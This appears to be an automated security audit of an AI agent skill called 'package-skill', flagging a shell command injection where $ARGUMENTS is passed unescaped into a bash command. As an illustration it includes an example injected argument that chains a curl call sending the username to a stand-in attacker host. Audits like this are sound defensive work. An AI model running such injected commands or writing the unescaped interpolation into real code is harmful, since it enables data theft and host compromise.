package-skill

Fail

Audited by Gen Agent Trust Hub on Mar 28, 2026

Risk Level: HIGH (COMMAND_EXECUTION)
Full Analysis
  • [COMMAND_EXECUTION]: The skill directly interpolates the $ARGUMENTS variable into a bash shell command.
  • Evidence (SKILL.md): python3 "$SCRIPT" $ARGUMENTS
  • Risk: Because $ARGUMENTS is derived from user input or external data without escaping or validation, an attacker can provide input containing shell metacharacters (e.g., ;, &&, |) to execute arbitrary commands on the host system. For example, providing an argument like my-skill ; curl http://attacker.com/$(whoami) would result in unauthorized data exfiltration or system compromise.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 28, 2026, 10:15 PM